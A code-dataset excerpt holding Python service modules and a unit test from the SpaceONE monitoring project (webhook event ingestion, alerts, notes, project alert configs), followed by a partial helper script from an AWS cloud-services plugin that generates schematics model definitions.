from spaceone.monitoring.model.event_model import Event
from spaceone.monitoring.model.alert_model import Alert
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.model.project_alert_config_model import ProjectAlertConfig
from spaceone.monitoring.model.escalation_policy_model import EscalationPolicy
from spaceone.monitoring.manager.alert_manager import AlertManager
from spaceone.monitoring.manager.webhook_manager import WebhookManager
from spaceone.monitoring.manager.event_manager import EventManager
from spaceone.monitoring.manager.event_rule_manager import EventRuleManager
from spaceone.monitoring.manager.job_manager import JobManager
from spaceone.monitoring.manager.webhook_plugin_manager import WebhookPluginManager
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler(exclude=['create'])
@authorization_handler(exclude=['create'])
@mutation_handler
@event_handler
class EventService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.event_mgr: EventManager = self.locator.get_manager('EventManager')
self.webhook_mgr: WebhookManager = self.locator.get_manager('WebhookManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'access_key', 'data'])
def create(self, params):
"""Create event
Args:
params (dict): {
'webhook_id': 'str',
'access_key': 'str',
                'data': 'dict'
}
Returns:
event_vo (object)
"""
webhook_data = self._get_webhook_data(params['webhook_id'])
self._check_access_key(params['access_key'], webhook_data['access_key'])
self._check_webhook_state(webhook_data)
try:
webhook_plugin_mgr: WebhookPluginManager = self.locator.get_manager('WebhookPluginManager')
endpoint, updated_version = webhook_plugin_mgr.get_webhook_plugin_endpoint({
'plugin_id': webhook_data['plugin_id'],
'version': webhook_data['plugin_version'],
'upgrade_mode': webhook_data['plugin_upgrade_mode']
}, webhook_data['domain_id'])
if updated_version:
_LOGGER.debug(f'[create] upgrade plugin version: {webhook_data["plugin_version"]} -> {updated_version}')
webhook_vo: Webhook = self.webhook_mgr.get_webhook(webhook_data['webhook_id'], webhook_data['domain_id'])
webhook_plugin_mgr.upgrade_webhook_plugin_version(webhook_vo, endpoint, updated_version)
cache.delete(f'webhook-data:{webhook_data["webhook_id"]}')
webhook_plugin_mgr.initialize(endpoint)
response = webhook_plugin_mgr.parse_event(webhook_data['plugin_options'], params['data'])
except Exception as e:
if not isinstance(e, ERROR_BASE):
e = ERROR_UNKNOWN(message=str(e))
_LOGGER.error(f'[create] Event parsing failed: {e.message}', exc_info=True)
response = self._create_error_event(webhook_data['name'], e.message)
for event_data in response.get('results', []):
# TODO: Check event data using schematics
_LOGGER.debug(f'[Event.create] event_data: {event_data}')
self._create_event(event_data, params['data'], webhook_data)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['event_id', 'domain_id'])
def get(self, params):
""" Get event
Args:
params (dict): {
'event_id': 'str',
'domain_id': 'str',
                'only': 'list'
}
Returns:
event_vo (object)
"""
return self.event_mgr.get_event(params['event_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['event_id', 'event_key', 'event_type', 'severity', 'resource_id', 'alert_id',
'webhook_id', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['event_id', 'title'])
def list(self, params):
""" List events
Args:
params (dict): {
'event_id': 'str',
'event_key': 'str',
'event_type': 'str',
'severity': 'str',
'resource_id': 'str',
'alert_id': 'str',
'webhook_id': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
event_vos (object)
total_count
"""
query = params.get('query', {})
return self.event_mgr.list_events(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['event_id', 'title'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.event_mgr.stat_events(query)
@cache.cacheable(key='webhook-data:{webhook_id}', expire=300)
def _get_webhook_data(self, webhook_id):
webhook_vo: Webhook = self.webhook_mgr.get_webhook_by_id(webhook_id)
return {
'webhook_id': webhook_vo.webhook_id,
'name': webhook_vo.name,
'project_id': webhook_vo.project_id,
'domain_id': webhook_vo.domain_id,
'state': webhook_vo.state,
'access_key': webhook_vo.access_key,
'plugin_id': webhook_vo.plugin_info.plugin_id,
'plugin_version': webhook_vo.plugin_info.version,
'plugin_upgrade_mode': webhook_vo.plugin_info.upgrade_mode,
'plugin_options': webhook_vo.plugin_info.options
}
@staticmethod
def _check_access_key(request_access_key, webhook_access_key):
if request_access_key != webhook_access_key:
raise ERROR_PERMISSION_DENIED()
@staticmethod
def _check_webhook_state(webhook_data):
if webhook_data['state'] == 'DISABLED':
raise ERROR_WEBHOOK_STATE_DISABLED(webhook_id=webhook_data['webhook_id'])
def _create_event(self, event_data, raw_data, webhook_data):
event_data['raw_data'] = copy.deepcopy(raw_data)
event_data['occurred_at'] = utils.iso8601_to_datetime(event_data.get('occurred_at'))
event_data['webhook_id'] = webhook_data['webhook_id']
event_data['project_id'] = webhook_data['project_id']
event_data['domain_id'] = webhook_data['domain_id']
event_data['severity'] = event_data.get('severity', 'NONE')
event_rule_mgr: EventRuleManager = self.locator.get_manager('EventRuleManager')
# Change event data by event rule
event_data = event_rule_mgr.change_event_data(event_data, webhook_data['project_id'], webhook_data['domain_id'])
event_vo: Event = self.event_mgr.get_event_by_key(event_data['event_key'], event_data['domain_id'])
if event_vo and event_vo.alert.state != 'RESOLVED':
# Resolve alert when receiving recovery event
if event_data['event_type'] == 'RECOVERY':
self._update_alert_state(event_vo.alert)
event_data['alert_id'] = event_vo.alert_id
event_data['alert'] = event_vo.alert
else:
# Skip health event
if event_data['event_type'] == 'RECOVERY':
_LOGGER.debug(f'[_create_event] Skip health event: {event_data.get("title")} (event_type = RECOVERY)')
return None
# Create new alert
_LOGGER.debug(f'[_create_event] Create new alert: {event_data.get("title")} '
f'(event_type = {event_data["event_type"]})')
alert_vo = self._create_alert(event_data)
event_data['alert_id'] = alert_vo.alert_id
event_data['alert'] = alert_vo
self.event_mgr.create_event(event_data)
def _create_alert(self, event_data):
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_data = copy.deepcopy(event_data)
if 'urgency' in event_data:
alert_data['urgency'] = event_data['urgency']
else:
alert_data['urgency'] = self._get_urgency_from_severity(event_data['severity'])
escalation_policy_id, escalation_ttl = self._get_escalation_policy_info(event_data['project_id'],
event_data['domain_id'])
alert_data['escalation_policy_id'] = escalation_policy_id
if event_data.get('no_notification', False):
alert_data['escalation_ttl'] = 0
else:
alert_data['escalation_ttl'] = escalation_ttl + 1
alert_data['triggered_by'] = alert_data['webhook_id']
if event_data.get('event_type', 'ERROR') == 'ERROR':
alert_data['state'] = 'ERROR'
alert_vo = alert_mgr.create_alert(alert_data)
self._create_notification(alert_vo, 'create_alert_notification')
return alert_vo
@staticmethod
def _get_urgency_from_severity(severity):
if severity in ['CRITICAL', 'ERROR', 'NOT_AVAILABLE']:
return 'HIGH'
else:
return 'LOW'
@cache.cacheable(key='escalation-policy-info:{domain_id}:{project_id}', expire=300)
def _get_escalation_policy_info(self, project_id, domain_id):
project_alert_config_vo: ProjectAlertConfig = self._get_project_alert_config(project_id, domain_id)
escalation_policy_vo: EscalationPolicy = project_alert_config_vo.escalation_policy
return escalation_policy_vo.escalation_policy_id, escalation_policy_vo.repeat_count
def _update_alert_state(self, alert_vo: Alert):
if self._is_auto_recovery(alert_vo.project_id, alert_vo.domain_id) and alert_vo.state != 'RESOLVED':
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_mgr.update_alert_by_vo({'state': 'RESOLVED'}, alert_vo)
self._create_notification(alert_vo, 'create_resolved_notification')
@cache.cacheable(key='auto-recovery:{domain_id}:{project_id}', expire=300)
def _is_auto_recovery(self, project_id, domain_id):
project_alert_config_vo: ProjectAlertConfig = self._get_project_alert_config(project_id, domain_id)
return project_alert_config_vo.options.recovery_mode == 'AUTO'
def _get_project_alert_config(self, project_id, domain_id):
project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
return project_alert_config_mgr.get_project_alert_config(project_id, domain_id)
def _create_notification(self, alert_vo: Alert, method):
# if alert_vo.state != 'ERROR':
self._set_transaction_token()
job_mgr: JobManager = self.locator.get_manager('JobManager')
job_mgr.push_task(
'monitoring_alert_notification_from_webhook',
'JobService',
method,
{
'alert_id': alert_vo.alert_id,
'domain_id': alert_vo.domain_id
}
)
def _set_transaction_token(self):
self.transaction.set_meta('token', config.get_global('TOKEN'))
self.transaction.service = 'monitoring'
self.transaction.resource = 'Event'
self.transaction.verb = 'create'
@staticmethod
def _create_error_event(webhook_name, error_message):
response = {
'results': [
{
'event_key': utils.generate_id('error'),
'event_type': 'ERROR',
'title': f'Webhook Event Parsing Error - {webhook_name}',
'description': error_message,
'severity': 'CRITICAL'
}
]
}
return response
```
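The severity-to-urgency rule in `_get_urgency_from_severity` is small enough to restate and verify standalone:
```python
# Standalone restatement of the severity-to-urgency rule used by EventService:
# CRITICAL / ERROR / NOT_AVAILABLE map to HIGH urgency, everything else to LOW.
def urgency_from_severity(severity: str) -> str:
    return 'HIGH' if severity in ('CRITICAL', 'ERROR', 'NOT_AVAILABLE') else 'LOW'

assert urgency_from_severity('CRITICAL') == 'HIGH'
assert urgency_from_severity('INFO') == 'LOW'
assert urgency_from_severity('NONE') == 'LOW'
```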
#### File: monitoring/service/note_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.monitoring.model.note_model import Note
from spaceone.monitoring.manager.alert_manager import AlertManager
from spaceone.monitoring.manager.note_manager import NoteManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class NoteService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.note_mgr: NoteManager = self.locator.get_manager('NoteManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['alert_id', 'note', 'domain_id'])
def create(self, params):
"""Create alert note
Args:
params (dict): {
'alert_id': 'str',
'note': 'str',
'domain_id': 'str'
}
Returns:
note_vo (object)
"""
user_id = self.transaction.get_meta('user_id')
alert_mgr: AlertManager = self.locator.get_manager('AlertManager')
alert_vo = alert_mgr.get_alert(params['alert_id'], params['domain_id'])
params['alert'] = alert_vo
params['project_id'] = alert_vo.project_id
params['created_by'] = user_id
return self.note_mgr.create_note(params)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def update(self, params):
"""Update alert note
Args:
params (dict): {
'note_id': 'str',
                'note': 'str',
'domain_id': 'str'
}
Returns:
note_vo (object)
"""
note_id = params['note_id']
domain_id = params['domain_id']
note_vo = self.note_mgr.get_note(note_id, domain_id)
# Check permission
return self.note_mgr.update_note_by_vo(params, note_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def delete(self, params):
"""Delete alert note
Args:
params (dict): {
'note_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.note_mgr.delete_note(params['note_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['note_id', 'domain_id'])
def get(self, params):
""" Get alert note
Args:
params (dict): {
'note_id': 'str',
'domain_id': 'str',
                'only': 'list'
}
Returns:
note_vo (object)
"""
return self.note_mgr.get_note(params['note_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['note_id', 'alert_id', 'created_by', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['note_id', 'note'])
def list(self, params):
""" List alert notes
Args:
params (dict): {
'note_id': 'str',
'alert_id': 'str',
'created_by': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
note_vos (object)
total_count
"""
query = params.get('query', {})
return self.note_mgr.list_notes(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['note_id', 'note'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.note_mgr.stat_notes(query)
```
#### File: monitoring/service/project_alert_config_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.monitoring.error import *
from spaceone.monitoring.model.project_alert_config_model import ProjectAlertConfig
from spaceone.monitoring.manager.identity_manager import IdentityManager
from spaceone.monitoring.manager.escalation_policy_manager import EscalationPolicyManager
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class ProjectAlertConfigService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def create(self, params):
"""Create project alert configuration
Args:
params (dict): {
'project_id': 'str',
'escalation_policy_id': 'str',
'options': 'dict',
'domain_id': 'str'
}
Returns:
project_alert_config_vo (object)
"""
project_id = params['project_id']
escalation_policy_id = params.get('escalation_policy_id')
domain_id = params['domain_id']
identity_mgr: IdentityManager = self.locator.get_manager('IdentityManager')
escalation_policy_mgr: EscalationPolicyManager = self.locator.get_manager('EscalationPolicyManager')
identity_mgr.get_project(project_id, domain_id)
if escalation_policy_id:
escalation_policy_vo = escalation_policy_mgr.get_escalation_policy(escalation_policy_id, domain_id)
if escalation_policy_vo.scope == 'PROJECT' and escalation_policy_vo.project_id != project_id:
raise ERROR_INVALID_ESCALATION_POLICY(escalation_policy_id=escalation_policy_id)
params['escalation_policy'] = escalation_policy_vo
else:
escalation_policy_vo = escalation_policy_mgr.get_default_escalation_policy(domain_id)
params['escalation_policy_id'] = escalation_policy_vo.escalation_policy_id
params['escalation_policy'] = escalation_policy_vo
return self.project_alert_config_mgr.create_project_alert_config(params)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def update(self, params):
"""Update project alert configuration
Args:
params (dict): {
'project_id': 'str',
                'escalation_policy_id': 'str',
'options': 'dict',
'domain_id': 'str'
}
Returns:
project_alert_config_vo (object)
"""
project_id = params['project_id']
escalation_policy_id = params.get('escalation_policy_id')
domain_id = params['domain_id']
project_alert_config_vo: ProjectAlertConfig = self.project_alert_config_mgr.get_project_alert_config(project_id,
domain_id)
if escalation_policy_id:
escalation_policy_mgr: EscalationPolicyManager = self.locator.get_manager('EscalationPolicyManager')
escalation_policy_vo = escalation_policy_mgr.get_escalation_policy(escalation_policy_id, domain_id)
if escalation_policy_vo.scope == 'PROJECT' and escalation_policy_vo.project_id != project_id:
raise ERROR_INVALID_ESCALATION_POLICY(escalation_policy_id=escalation_policy_id)
params['escalation_policy'] = escalation_policy_vo
if 'options' in params:
if 'recovery_mode' not in params['options']:
params['options']['recovery_mode'] = project_alert_config_vo.options.recovery_mode
if 'notification_urgency' not in params['options']:
params['options']['notification_urgency'] = project_alert_config_vo.options.notification_urgency
return self.project_alert_config_mgr.update_project_alert_config_by_vo(params, project_alert_config_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
def delete(self, params):
"""Delete project alert configuration
Args:
params (dict): {
'project_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.project_alert_config_mgr.delete_project_alert_config(params['project_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['project_id', 'domain_id'])
@change_only_key({'escalation_policy_info': 'escalation_policy'})
def get(self, params):
""" Get project alert configuration
Args:
params (dict): {
'project_id': 'str',
'domain_id': 'str',
                'only': 'list'
}
Returns:
project_alert_config_vo (object)
"""
return self.project_alert_config_mgr.get_project_alert_config(params['project_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@change_only_key({'escalation_policy_info': 'escalation_policy'}, key_path='query.only')
@append_query_filter(['project_id', 'escalation_policy_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['project_id'])
def list(self, params):
""" List project alert configurations
Args:
params (dict): {
'project_id': 'str',
'escalation_policy_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
project_alert_config_vos (object)
total_count
"""
query = params.get('query', {})
return self.project_alert_config_mgr.list_project_alert_configs(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['project_id'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.project_alert_config_mgr.stat_project_alert_configs(query)
```
#### File: monitoring/service/webhook_service.py
```python
import logging
from spaceone.core.service import *
from spaceone.core import utils
from spaceone.monitoring.error import *
from spaceone.monitoring.model.webhook_model import Webhook
from spaceone.monitoring.manager.project_alert_config_manager import ProjectAlertConfigManager
from spaceone.monitoring.manager.repository_manager import RepositoryManager
from spaceone.monitoring.manager.webhook_plugin_manager import WebhookPluginManager
from spaceone.monitoring.manager.webhook_manager import WebhookManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class WebhookService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.webhook_mgr: WebhookManager = self.locator.get_manager('WebhookManager')
self.webhook_plugin_mgr: WebhookPluginManager = self.locator.get_manager('WebhookPluginManager')
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['name', 'plugin_info', 'project_id', 'domain_id'])
def create(self, params):
"""Create webhook
Args:
params (dict): {
'name': 'str',
'plugin_info': 'dict',
                'project_id': 'str',
'tags': 'dict',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
domain_id = params['domain_id']
project_id = params['project_id']
project_alert_config_mgr: ProjectAlertConfigManager = self.locator.get_manager('ProjectAlertConfigManager')
project_alert_config_mgr.get_project_alert_config(project_id, domain_id)
self._check_plugin_info(params['plugin_info'])
plugin_info = self._get_plugin(params['plugin_info'], domain_id)
params['capability'] = plugin_info.get('capability', {})
_LOGGER.debug(f'[create] Init Plugin: {params["plugin_info"]}')
endpoint, updated_version = self.webhook_plugin_mgr.get_webhook_plugin_endpoint(params['plugin_info'], domain_id)
if updated_version:
params['plugin_info']['version'] = updated_version
options = params['plugin_info'].get('options', {})
plugin_metadata = self._init_plugin(endpoint, options)
params['plugin_info']['metadata'] = plugin_metadata
webhook_vo: Webhook = self.webhook_mgr.create_webhook(params)
access_key = self._generate_access_key()
webhook_url = self._make_webhook_url(webhook_vo.webhook_id, access_key)
return self.webhook_mgr.update_webhook_by_vo({
'access_key': access_key,
'webhook_url': webhook_url
}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def update(self, params):
"""Update webhook
Args:
params (dict): {
'webhook_id': 'str',
                'name': 'str',
                'tags': 'dict',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo(params, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def enable(self, params):
""" Enable webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo({'state': 'ENABLED'}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def disable(self, params):
""" Disable webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
return self.webhook_mgr.update_webhook_by_vo({'state': 'DISABLED'}, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def delete(self, params):
"""Delete webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
self.webhook_mgr.delete_webhook(params['webhook_id'], params['domain_id'])
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def verify_plugin(self, params):
""" Verify webhook plugin
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
endpoint = self.webhook_plugin_mgr.get_webhook_plugin_endpoint_by_vo(webhook_vo)
self._verify_plugin(endpoint, webhook_vo.plugin_info.options)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def update_plugin(self, params):
"""Update webhook plugin
Args:
params (dict): {
'webhook_id': 'str',
'version': 'str',
'options': 'dict',
'upgrade_mode': 'str',
'domain_id': 'str'
}
Returns:
webhook_vo (object)
"""
webhook_id = params['webhook_id']
domain_id = params['domain_id']
options = params.get('options')
version = params.get('version')
upgrade_mode = params.get('upgrade_mode')
webhook_vo = self.webhook_mgr.get_webhook(webhook_id, domain_id)
plugin_info = webhook_vo.plugin_info.to_dict()
if version:
plugin_info['version'] = version
if options:
plugin_info['options'] = options
if upgrade_mode:
plugin_info['upgrade_mode'] = upgrade_mode
endpoint, updated_version = self.webhook_plugin_mgr.get_webhook_plugin_endpoint(plugin_info, domain_id)
if updated_version:
plugin_info['version'] = updated_version
plugin_metadata = self._init_plugin(endpoint, plugin_info.get('options', {}))
plugin_info['metadata'] = plugin_metadata
params = {
'plugin_info': plugin_info
}
_LOGGER.debug(f'[update_plugin] {plugin_info}')
return self.webhook_mgr.update_webhook_by_vo(params, webhook_vo)
@transaction(append_meta={'authorization.scope': 'PROJECT'})
@check_required(['webhook_id', 'domain_id'])
def get(self, params):
""" Get webhook
Args:
params (dict): {
'webhook_id': 'str',
'domain_id': 'str',
                'only': 'list'
}
Returns:
webhook_vo (object)
"""
return self.webhook_mgr.get_webhook(params['webhook_id'], params['domain_id'], params.get('only'))
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['domain_id'])
@append_query_filter(['webhook_id', 'name', 'state', 'access_key', 'project_id', 'domain_id', 'user_projects'])
@append_keyword_filter(['webhook_id', 'name'])
def list(self, params):
""" List webhooks
Args:
params (dict): {
'webhook_id': 'str',
'name': 'str',
'state': 'str',
'project_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)',
'user_projects': 'list', // from meta
}
Returns:
webhook_vos (object)
total_count
"""
query = params.get('query', {})
return self.webhook_mgr.list_webhooks(query)
@transaction(append_meta={
'authorization.scope': 'PROJECT',
'mutation.append_parameter': {'user_projects': 'authorization.projects'}
})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id', 'user_projects'])
@append_keyword_filter(['webhook_id', 'name'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)',
'user_projects': 'list', // from meta
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.webhook_mgr.stat_webhooks(query)
@staticmethod
def _generate_access_key():
return utils.random_string(16)
@staticmethod
def _make_webhook_url(webhook_id, access_key):
return f'/monitoring/v1/webhook/{webhook_id}/{access_key}/events'
@staticmethod
def _check_plugin_info(plugin_info_params):
if 'plugin_id' not in plugin_info_params:
raise ERROR_REQUIRED_PARAMETER(key='plugin_info.plugin_id')
def _get_plugin(self, plugin_info, domain_id):
plugin_id = plugin_info['plugin_id']
repo_mgr: RepositoryManager = self.locator.get_manager('RepositoryManager')
plugin_info = repo_mgr.get_plugin(plugin_id, domain_id)
return plugin_info
def _init_plugin(self, endpoint, options):
self.webhook_plugin_mgr.initialize(endpoint)
return self.webhook_plugin_mgr.init_plugin(options)
def _verify_plugin(self, endpoint, options):
self.webhook_plugin_mgr.initialize(endpoint)
self.webhook_plugin_mgr.verify_plugin(options)
```
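At create time the service pairs a 16-character random access key with a path-style webhook URL. The resulting shape can be sketched as follows (both identifiers are illustrative):
```python
# Shape of the URL built by _make_webhook_url; both values are invented.
webhook_id = 'webhook-2a9e3f51c7d0'   # hypothetical webhook ID
access_key = 'a1b2c3d4e5f60718'       # stand-in for utils.random_string(16)
url = f'/monitoring/v1/webhook/{webhook_id}/{access_key}/events'
print(url)
# /monitoring/v1/webhook/webhook-2a9e3f51c7d0/a1b2c3d4e5f60718/events
```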
#### File: test/api/test_log_api.py
```python
import unittest
from unittest.mock import patch
from mongoengine import connect, disconnect
from google.protobuf.json_format import MessageToDict
from google.protobuf.empty_pb2 import Empty
from spaceone.core.unittest.result import print_message
from spaceone.core.unittest.runner import RichTestRunner
from spaceone.core import config
from spaceone.core import utils
from spaceone.core.service import BaseService
from spaceone.core.locator import Locator
from spaceone.core.pygrpc import BaseAPI
from spaceone.api.monitoring.v1 import log_pb2
from spaceone.monitoring.interface.grpc.v1.log import Log
from test.factory.log_factory import LogDataFactory
class _MockLogService(BaseService):
def list(self, params):
return LogDataFactory()
class TestLogAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
config.init_conf(package='spaceone.monitoring')
connect('test', host='mongomock://localhost')
super().setUpClass()
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
disconnect()
@patch.object(BaseAPI, '__init__', return_value=None)
@patch.object(Locator, 'get_service', return_value=_MockLogService())
@patch.object(BaseAPI, 'parse_request')
def test_list_logs(self, mock_parse_request, *args):
print(LogDataFactory())
mock_parse_request.return_value = ({}, {})
log_servicer = Log()
logs_info = log_servicer.list({}, {})
print_message(logs_info, 'test_list_logs')
if __name__ == "__main__":
unittest.main(testRunner=RichTestRunner)
```
|
{
"source": "jean1042/plugin-aws-cloud-services",
"score": 3
}
|
#### File: plugin-aws-cloud-services/bin/srt.py
```python
import re
from dataclasses import dataclass
from functools import partial
from typing import List
def make_snake_name(name):
    s1 = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', name)
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def make_simple_type(type_name, match):
field = match.group(1)
snake_field = make_snake_name(field)
return f"""\n'{field}':'{snake_field} = {type_name}(deserialize_from="{field}")'"""
prefix_re = r"\s*'(\w+)'\s?:\s?"
boolean_re = re.compile(rf"{prefix_re}True\s?\|\s?False")
int_re = re.compile(rf"{prefix_re}123")
float_re = re.compile(rf"{prefix_re}123\.0")
datetime_re = re.compile(rf"{prefix_re}datetime\(.*\)")
string_re = re.compile(rf"{prefix_re}'string'")
choice_string_re = re.compile(rf"{prefix_re}(('[\w\d\.\-\_]+'\|?)+)")
def make_list_type(type_name, match):
field = match.group(1)
snake_field = make_snake_name(field)
return f"""\n'{field}':'{snake_field} = ListType({type_name},deserialize_from="{field}")'"""
list_string_re = re.compile(rf"{prefix_re}(\[\n\s*(('string')|(('[\w\d\.]+')\|?)+),\n\s*\])")
list_int_re = re.compile(rf"{prefix_re}(\[\n\s*123,\n\s*\])")
list_float_re = re.compile(rf"{prefix_re}(\[\n\s*123\.0,\n\s*\])")
@dataclass
class Model:
raw: str
class_name: str
model_intro_re = re.compile(r"\s*'(\w+)'\s?:\s?\{")
model_in = re.compile(r"((\s*\{)|(\s*'(\w+)'\s?:\s?\{))")
model_end = re.compile(r'\s*\},?\s*')
list_in = re.compile(r"((\s*\[)|(\s*'(\w+)'\s?:\s?\[))")
list_end = re.compile(r'\s*\],?\s*')
def make_choice_string_type(match):
    field = match.group(1)
    snake_field = make_snake_name(field)
    raw_choices = match.group(2).split('|')
    choices = ",".join([c.replace("'", '"') for c in raw_choices])
    return f"""\n'{field}':'{snake_field} = StringType(deserialize_from="{field}",choices=({choices}))'"""
def find_model(text):
result = []
models = []
is_in_model = False
model_buffer = []
nested_count = 0
model_name = ''
raw = text.split('\n')
for l in raw:
if is_in_model:
if model_in.match(l):
nested_count += 1
            elif (nested_count >= 1) and (model_end.match(l) is not None):
nested_count -= 1
elif model_end.match(l):
model_buffer.append(l)
models.append(Model('\n'.join(model_buffer), model_name))
snake_field = make_snake_name(model_name)
result.append(
f"""'{model_name}':'{snake_field} = ModelType({model_name},deserialize_from="{model_name}")',""")
# reset temp model
is_in_model = False
continue
model_buffer.append(l)
else:
if match := model_intro_re.match(l):
is_in_model = True
model_name = match.group(1)
model_buffer = ['{']
else:
result.append(l)
